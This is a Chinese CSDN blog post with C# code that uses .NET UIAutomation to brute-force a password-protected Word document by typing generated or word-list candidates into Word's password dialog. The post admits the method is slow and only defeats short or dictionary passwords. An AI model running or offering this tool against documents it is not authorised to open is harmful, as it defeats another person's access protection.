.NET UIAutomation实现Word文档加密暴力破解
.NET UIAutomation簡介
UIAutomation是.NET 3.5之后提供的“界面自動化測試”技術,主要通過Win32程序窗口和控件句柄獲得控制權(反射和HOOK機制),從而達到利用程序腳本實現各類操作的目的,一般利用其實現針對Windows平臺應用程序的自動化測試。

暴力破解方法
對于一個設置了密碼訪問限制的Word文檔,可以利用UIAutomation的特點,通過窮舉密碼或使用密碼字典的方式不斷嘗試,進行破解。

破解方法實現
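可以窮舉字母和數字的組合作為密碼輸入數據,當然你如果愿意也可以加入特殊字符。需要注意的是,下文代碼的每次嘗試都要經過Word的密碼對話框,并且至少等待約2秒(DoCrack中有兩次Thread.Sleep(1000)),而62個字符、1到6位的組合約有5.8×10^10種,完整窮舉需要數千年;因此這種方法只對很短或出現在字典中的弱密碼有實際意義,足夠長的隨機密碼可以使其失效。主要實現代碼參見:
using System;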
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.IO;namespace PasswordCrack
{
    /// <summary>
    /// Sources of candidate strings for the demo. Every candidate is handed to a
    /// <c>CrackHandler</c> callback; this class itself never touches Word.
    /// </summary>
    class Util
    {
        /// <summary>
        /// Reads the text file at <paramref name="path"/> (decoded with
        /// <c>Encoding.Default</c>) and passes each line to <paramref name="crack"/>.
        /// </summary>
        /// <param name="path">Path of the word-list file.</param>
        /// <param name="crack">Callback invoked once per line.</param>
        public void ReadLineAndCrack(string path, CrackHandler crack)
        {
            try
            {
                using (StreamReader input = new StreamReader(path, Encoding.Default))
                {
                    for (string entry = input.ReadLine(); entry != null; entry = input.ReadLine())
                    {
                        crack(entry);
                    }
                }
            }
            catch (IOException e)
            {
                // An I/O failure ends the run; only the stack trace is printed.
                Console.WriteLine(e.StackTrace);
            }
        }

        /// <summary>
        /// Generates the candidates of exactly <paramref name="column"/> characters.
        /// </summary>
        /// <param name="column">Number of character positions.</param>
        /// <param name="crack">Callback invoked for each generated string.</param>
        public void GenCrackWordByColumn(int column, CrackHandler crack)
        {
            string[] slots = new string[column];
            GenColumnsWord(slots, 0, slots.Length, crack);
        }

        /// <summary>
        /// Generates candidates for every length from <paramref name="begin"/> up to
        /// <c>begin + length - 1</c>. Nothing is generated when <paramref name="begin"/>
        /// is below 1 or <paramref name="length"/> is negative.
        /// </summary>
        /// <param name="begin">First candidate length.</param>
        /// <param name="length">How many consecutive lengths to cover.</param>
        /// <param name="crack">Callback invoked for each generated string.</param>
        public void GenCrackWordByScope(int begin, int length, CrackHandler crack)
        {
            bool rangeIsValid = begin >= 1 && length >= 0;
            if (!rangeIsValid)
            {
                return;
            }

            int width = begin;
            while (width < begin + length)
            {
                string[] slots = new string[width];
                GenColumnsWord(slots, 0, slots.Length, crack);
                width++;
            }
        }

        /// <summary>
        /// Generates candidates for every length from 1 up to <paramref name="bit"/>.
        /// </summary>
        /// <param name="bit">Largest candidate length.</param>
        /// <param name="crack">Callback invoked for each generated string.</param>
        public void GenCrackWord(int bit, CrackHandler crack)
        {
            int width = 0;
            while (width < bit)
            {
                width++;
                string[] slots = new string[width];
                GenColumnsWord(slots, 0, slots.Length, crack);
            }
        }

        /// <summary>
        /// Recursively fills <paramref name="columns"/> from position
        /// <paramref name="index"/> onwards with every symbol of the 62-character
        /// alphabet and reports the joined string to <paramref name="crack"/>.
        /// </summary>
        /// <remarks>
        /// For a position other than the last one the method first recurses into the
        /// next position; once that call returns, the current contents of
        /// <paramref name="columns"/> are joined and passed to <paramref name="crack"/>
        /// as well.
        /// </remarks>
        /// <param name="columns">Working buffer, one single-character string per position.</param>
        /// <param name="index">Position to fill; the outermost call passes 0.</param>
        /// <param name="bit">Number of positions that make up a candidate.</param>
        /// <param name="crack">Callback invoked for each joined string.</param>
        public void GenColumnsWord(string[] columns, int index, int bit, CrackHandler crack)
        {
            // Digits first, then lowercase, then uppercase letters (62 symbols).
            const string symbols = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
            bool isLastColumn = index == bit - 1;

            foreach (char symbol in symbols)
            {
                columns[index] = symbol.ToString();

                if (!isLastColumn)
                {
                    GenColumnsWord(columns, index + 1, bit, crack);
                }

                StringBuilder word = new StringBuilder();
                int position = 0;
                while (position < bit)
                {
                    word.Append(columns[position]);
                    position++;
                }
                crack(word.ToString());
            }
        }
    }
}

獲取Word密碼輸入窗口句柄鏈
我們使用UIAutomationSpy獲取Word密碼輸入窗口句柄鏈:

UIAutomation公共方法
在此需要實現一些公共方法,尤其是自動化啟動Word主程序進程,以及通過進程Id號獲得主窗體句柄,主要實現代碼參見:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Threading;
using System.Windows.Automation;namespace PasswordCrack
{
    /// <summary>
    /// Thin helpers over System.Windows.Automation: start or locate a process, resolve
    /// its main window and find, fill and invoke child controls.
    /// </summary>
    class UIAutomationHelper
    {
        // Path handed to Process.Start by the launcher thread; set in GetProcessId.
        private string path;

        /// <summary>
        /// Thread entry point: opens <c>path</c> with <c>Process.Start</c>.
        /// </summary>
        private void StartProcess()
        {
            Process.Start(path);
        }

        /// <summary>
        /// Starts <paramref name="path"/> on a separate thread and returns the Id of the
        /// first process named <paramref name="name"/>.
        /// </summary>
        /// <remarks>
        /// The launcher thread is started on every call, whether or not a matching
        /// process already exists.
        /// </remarks>
        /// <param name="path">Program or document path passed to <c>Process.Start</c>.</param>
        /// <param name="name">Process name to look up.</param>
        /// <param name="wait">
        /// Milliseconds to wait when a matching process already exists; values of 0 or
        /// less fall back to 500.
        /// </param>
        /// <returns>The process Id, or 0 if no matching process showed up before the timeout.</returns>
        public int GetProcessId(string path, string name, int wait)
        {
            const int pollIntervalMs = 1000;
            const int maxWaitMs = 60000;

            this.path = path;
            Thread launcher = new Thread(StartProcess);

            bool alreadyRunning = Process.GetProcessesByName(name).Length > 0;
            launcher.Start();

            if (alreadyRunning)
            {
                Thread.Sleep(wait > 0 ? wait : 500);
                return Process.GetProcessesByName(name)[0].Id;
            }

            // Not running yet: poll once per second until it appears or the budget is spent.
            int foundId = 0;
            int elapsedMs = 0;
            do
            {
                if (Process.GetProcessesByName(name).Length > 0)
                {
                    foundId = Process.GetProcessesByName(name)[0].Id;
                }
                Thread.Sleep(pollIntervalMs);
                elapsedMs += pollIntervalMs;
            }
            while (foundId == 0 && elapsedMs <= maxWaitMs);

            return foundId;
        }

        /// <summary>
        /// Returns the automation element for the main window of process <paramref name="pId"/>.
        /// </summary>
        /// <param name="pId">Process Id.</param>
        public AutomationElement GetMainAutomationElementByPid(int pId)
        {
            IntPtr mainWindow = Process.GetProcessById(pId).MainWindowHandle;
            return AutomationElement.FromHandle(mainWindow);
        }

        /// <summary>
        /// Finds the first direct child of <paramref name="parent"/> with the given
        /// control type and name.
        /// </summary>
        /// <remarks>
        /// Despite the parameter name, <paramref name="className"/> is compared with
        /// <c>AutomationElement.NameProperty</c>, not with the element's class name.
        /// </remarks>
        /// <param name="parent">Element whose children are searched.</param>
        /// <param name="type">Required control type.</param>
        /// <param name="className">Required value of the Name property.</param>
        /// <returns>The result of <c>FindFirst</c> for that condition.</returns>
        public AutomationElement GetHandleByClassAndControlTypeFromParentHandle(AutomationElement parent, ControlType type, string className)
        {
            PropertyCondition byName = new PropertyCondition(AutomationElement.NameProperty, className);
            PropertyCondition byType = new PropertyCondition(AutomationElement.ControlTypeProperty, type);
            return parent.FindFirst(TreeScope.Children, new AndCondition(byName, byType));
        }

        /// <summary>
        /// Returns all direct children of <paramref name="parent"/> that have the given control type.
        /// </summary>
        /// <param name="parent">Element whose children are searched.</param>
        /// <param name="type">Required control type.</param>
        public AutomationElementCollection GetHandlesByControlTypeFromParentHandle(AutomationElement parent, ControlType type)
        {
            PropertyCondition byType = new PropertyCondition(AutomationElement.ControlTypeProperty, type);
            return parent.FindAll(TreeScope.Children, byType);
        }

        /// <summary>Finds a direct child Window whose Name property equals <paramref name="className"/>.</summary>
        public AutomationElement GetWindowByClassFromParentHandle(AutomationElement parentHandle, string className)
        {
            ControlType wanted = ControlType.Window;
            return GetHandleByClassAndControlTypeFromParentHandle(parentHandle, wanted, className);
        }

        /// <summary>Finds a direct child Button whose Name property equals <paramref name="className"/>.</summary>
        public AutomationElement GetButtonByClassFromParentHandle(AutomationElement parentHandle, string className)
        {
            ControlType wanted = ControlType.Button;
            return GetHandleByClassAndControlTypeFromParentHandle(parentHandle, wanted, className);
        }

        /// <summary>Returns all direct child Edit controls of <paramref name="parentHandle"/>.</summary>
        public AutomationElementCollection GetTextEditsFromParentHandle(AutomationElement parentHandle)
        {
            ControlType wanted = ControlType.Edit;
            return GetHandlesByControlTypeFromParentHandle(parentHandle, wanted);
        }

        /// <summary>Finds a direct child Edit control whose Name property equals <paramref name="className"/>.</summary>
        public AutomationElement GetTextEditByClassFromParentHandle(AutomationElement parentHandle, string className)
        {
            ControlType wanted = ControlType.Edit;
            return GetHandleByClassAndControlTypeFromParentHandle(parentHandle, wanted, className);
        }

        /// <summary>
        /// Same lookup as <c>GetButtonByClassFromParentHandle</c>: a direct child Button
        /// whose Name property equals <paramref name="className"/>.
        /// </summary>
        public AutomationElement GetTextButtonByClassFromParentHandle(AutomationElement parentHandle, string className)
        {
            ControlType wanted = ControlType.Button;
            return GetHandleByClassAndControlTypeFromParentHandle(parentHandle, wanted, className);
        }

        /// <summary>
        /// Writes <paramref name="strData"/> into an edit control through its ValuePattern.
        /// </summary>
        /// <param name="textEditHandle">The edit control.</param>
        /// <param name="strData">Text to set.</param>
        /// <returns>
        /// <c>true</c> after the value was set; <c>false</c> when the pattern object is
        /// not a <c>ValuePattern</c>.
        /// </returns>
        /// <exception cref="InvalidOperationException">
        /// The control is disabled, not keyboard-focusable or read-only.
        /// </exception>
        public bool SetTextEditData(AutomationElement textEditHandle, string strData)
        {
            if (!textEditHandle.Current.IsEnabled)
            {
                throw new InvalidOperationException("The control is not enabled.\n");
            }

            if (!textEditHandle.Current.IsKeyboardFocusable)
            {
                throw new InvalidOperationException("The control is not focusable.\n");
            }

            ValuePattern valueAccess = textEditHandle.GetCurrentPattern(ValuePattern.Pattern) as ValuePattern;
            if (valueAccess == null)
            {
                return false;
            }

            if (valueAccess.Current.IsReadOnly)
            {
                throw new InvalidOperationException("The control is read-only.\n");
            }

            valueAccess.SetValue(strData);
            return true;
        }

        /// <summary>
        /// Invokes (clicks) a button through its InvokePattern.
        /// </summary>
        /// <param name="buttonHandle">The button element; may be null.</param>
        /// <returns>
        /// <c>true</c> after the invoke call; <c>false</c> when the handle is null or the
        /// element does not expose an InvokePattern.
        /// </returns>
        /// <exception cref="InvalidProgramException">
        /// Wraps any exception raised while resolving or invoking the pattern.
        /// </exception>
        public bool ButtonLeftClick(AutomationElement buttonHandle)
        {
            try
            {
                object rawPattern;
                if (buttonHandle == null || !buttonHandle.TryGetCurrentPattern(InvokePattern.Pattern, out rawPattern))
                {
                    return false;
                }

                InvokePattern clicker = (InvokePattern)rawPattern;
                clicker.Invoke();
                return true;
            }
            catch (Exception e)
            {
                throw new InvalidProgramException("Left click buttion failed", e);
            }
        }
    }
}

核心破解方法實現
利用.NET委托技術,在窮舉字母和數字組合的過程中調用破解方法:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
using System.Windows.Automation;namespace PasswordCrack
{
    /// <summary>Callback that receives one candidate string.</summary>
    public delegate void CrackHandler(string word);

    /// <summary>
    /// Builds the callback chain that submits one candidate to the Word password dialog
    /// through UI Automation.
    /// </summary>
    /// <remarks>
    /// NOTE(review): every candidate is written to the console in clear text before it
    /// is tried, and again when no error window is found afterwards.
    /// </remarks>
    class Crack
    {
        // Document opened for each attempt, and the process name used to find Word.
        private const string PATH = "test.docx";
        private const string PROCESS_NAME = "WINWORD";

        /// <summary>
        /// Returns a multicast delegate that calls <c>Print</c> first and <c>DoCrack</c> second.
        /// </summary>
        public CrackHandler GetCrack()
        {
            CrackHandler chain = new CrackHandler(Print);
            chain += DoCrack;
            return chain;
        }

        /// <summary>Writes the candidate to the console.</summary>
        private void Print(string word)
        {
            Console.WriteLine(word);
        }

        /// <summary>
        /// Types <paramref name="word"/> into the password dialog, confirms it and checks
        /// whether an error window appears.
        /// </summary>
        /// <param name="word">Candidate to submit.</param>
        private void DoCrack(string word)
        {
            UIAutomationHelper helper = new UIAutomationHelper();

            int wordPid = helper.GetProcessId(PATH, PROCESS_NAME, 500);
            Console.WriteLine(wordPid);
            Thread.Sleep(1000);

            AutomationElement wordWindow = helper.GetMainAutomationElementByPid(wordPid);

            // The dialog and its confirm button are located by their localized names.
            AutomationElement prompt = helper.GetWindowByClassFromParentHandle(wordWindow, "密碼");
            AutomationElement promptInput = helper.GetTextEditsFromParentHandle(prompt)[0];
            helper.SetTextEditData(promptInput, word);
            helper.ButtonLeftClick(helper.GetButtonByClassFromParentHandle(prompt, "確定"));
            Thread.Sleep(1000);

            // A child window named "Microsoft Office Word" is treated as the rejection notice.
            AutomationElement rejection = helper.GetWindowByClassFromParentHandle(wordWindow, "Microsoft Office Word");
            if (rejection == null)
            {
                Console.WriteLine(word);
                return;
            }

            AutomationElement dismiss = helper.GetButtonByClassFromParentHandle(rejection, "確定");
            helper.ButtonLeftClick(dismiss);
        }
    }
}

程序入口
using System;
using System.Collections;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Threading;
using System.Windows.Automation;namespace PasswordCrack
{
    /// <summary>Console entry point of the demo.</summary>
    class Program
    {
        /// <summary>
        /// Runs the generator for candidate lengths 1 to 6 and feeds each candidate to
        /// the callback chain returned by <c>Crack.GetCrack</c>.
        /// </summary>
        /// <param name="args">Command-line arguments; not used.</param>
        static void Main(string[] args)
        {
            const int maxLength = 6;

            Util generator = new Util();
            CrackHandler handler = new Crack().GetCrack();
            generator.GenCrackWord(maxLength, handler);
        }
    }
}

————————————————
版權聲明:本文為CSDN博主「xreztento」的原創文章,遵循 CC 4.0 BY-SA 版權協議,轉載請附上原文出處鏈接及本聲明。
原文鏈接:https://blog.csdn.net/xreztento/article/details/50325037